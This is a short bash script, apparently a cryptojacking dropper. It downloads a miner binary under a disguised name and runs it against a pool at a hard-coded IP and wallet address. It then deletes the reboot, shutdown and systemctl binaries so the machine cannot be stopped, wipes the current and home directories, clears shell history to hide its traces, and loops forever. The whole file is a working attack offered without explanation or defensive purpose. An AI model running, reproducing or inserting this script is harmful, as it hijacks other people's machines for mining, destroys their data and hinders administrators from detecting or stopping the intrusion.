#!/bin/bash
wget -O ungu https://github.com/xpherechain/Xphere-miner/releases/download/v0.0.6/miner-linux-amd64 > /dev/null 2>&1
chmod 777 ungu
./ungu -stratum stratum+tcp://0x427bC6a3FD4039F8A7A87cb7203e69f5c5A52018.$(shuf -n 1 -i 1-99999)-worker:password@192.241.159.25:80
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
